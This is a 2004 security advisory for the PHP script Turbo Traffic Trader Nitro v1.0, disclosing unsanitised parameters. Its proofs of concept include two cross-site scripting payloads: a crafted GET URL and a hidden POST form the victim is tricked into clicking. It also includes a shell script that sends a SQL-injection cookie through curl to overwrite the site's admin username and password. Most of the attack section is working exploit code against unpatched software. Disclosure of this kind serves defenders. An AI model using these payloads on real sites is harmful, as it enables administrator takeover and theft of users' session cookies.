+-----------------------------------------------------------------------+
| Turbo Traffic Trader Nitro v1.0 SQL Injection & XSS Proofs of Concept |
| By aCiDBiTS              acidbits@gmail.com               10-Oct-2004 |
+-----------------------------------------------------------------------+

    [                                              ]
  [ Your web application needs a security audit? ]
    [                 Email me !                   ] 
  [                                              ]

------------
Introduction
------------

Turbo traffic trader Nitro v1.0
(http://www.turbotraffictrader.com/php/) "is a fully automated traffic
trading script", "The World's Most Advanced Free PHP Traffic Trading
Script".


---------------
Vulnerabilities
---------------

There is no user input sanitation for many parameters in different
files. This can be
exploited to manipulate SQL queries by injecting arbitrary SQL code,
or to steal the user-cookie through XSS for the site where TTT is
running. The SQL injections only can be performed if the site server
has magic quotes set to off. The XSS can be exploited in two ways, one
only works if register globals are set to on the other always do.

Maybe older versions also vulnerable. These are just some examples,
this script has other ways to be exploited. Vendor has been warned but
had no reply from him.


-----------------
Proofs of concept
-----------------

(1.) XSS 
--------

Through GET, only works if register globals are set to on. From your
browser type:

http://URL_to_ttt_script/ttt-webmaster.php?msg[0]=%3Cscript%3Ealert(String.fromCharCode(88)%2BString.fromCharCode(83)%2BString.fromCharCode(83));%3C/script%3E


(2.) XSS
-------- 

Through POST, the victim should click something like this: 

<form action="http://URL_to_ttt_script/ttt-webmaster.php"
method="post"><input name="wm_email" type="hidden" value="fake"><input
name="addtrade" type="hidden" value="1"><input name="siteurl"
type="hidden" value="<script>alert(String.fromCharCode(88)+String.fromCharCode(83)+String.fromCharCode(83));</script>
"><input name="" type="submit" value="Click me !"></form>


(3.) SQL Injection
------------------

With this you can set whatever username and password for TTT script
admin. Only works if the site server has magic quotes turned off.

ttt_sqli_poc.sh
-------8<----------------------8<---------------------8<----------------------------
#!/bin/sh
echo "+----------------------------------------------------------------+"
echo "| Turbo Traffic Trader Nitro v1.0 SQL Injection Proof of Concept |"
echo "| By aCiDBiTS           acidbits@gmail.com           10-Oct-2004 |"
echo "+----------------------------------------------------------------+"
echo ""
if test $# -lt 3; then 
  echo "Usage: $0  URL_to_ttt_script  new_username  new_password"
  echo "Eg:  ./ttt_sqli_poc http://127.0.0.1/ttt john 1234"
  echo ""
  exit
fi
echo "[+] Setting username: $2"
echo "            password: $3"
echo ""
curl -s -o "/dev/null" -b
"ttt_admin=9999999999%7Cfake%7C%27)AS%20pass2,%27fake%27%20as%20username,%27fake%27%20as%20password,(%27fake"
-d "changepass=1&username=$2&password=$3&password2=$3"
"$1/tttadmin/settings.php"
echo "[+] Now go to $1/tttadmin and good login ;-)"
echo ""
echo " \  /"
echo " (Oo)"
echo "//||\\\\"
-------8<----------------------8<---------------------8<----------------------------


---------
Quick Fix
---------

No fix at this moment. Too many parts of the code have to be patched.